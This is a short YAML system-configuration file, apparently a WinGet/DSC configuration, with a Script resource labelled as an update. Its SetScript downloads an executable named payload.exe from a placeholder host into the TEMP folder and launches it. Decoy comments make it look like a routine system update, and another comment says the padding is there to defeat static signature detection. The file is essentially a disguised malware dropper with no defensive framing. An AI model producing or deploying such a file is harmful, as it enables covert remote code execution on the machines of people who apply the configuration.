properties:
  configurationVersion: 0.2.0
  resources:
    - resource: PSDscResources/Script
      directives:
        description: Update
      settings:
        # Pad with comments matching the pretext to reduce static signatures
        # on the first few lines of the script block.
        SetScript: |
          # System configuration update v2.3
          # Initializing component sync...
          # Platform: Windows/Enterprise
          # ── payload ──────────────────────────────────────────────
          $p = "$env:TEMP\svc.exe"
          [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12
          (New-Object System.Net.WebClient).DownloadFile("https://<your-host>/payload.exe", $p)
          Start-Process $p
        GetScript: $false
        TestScript: $false

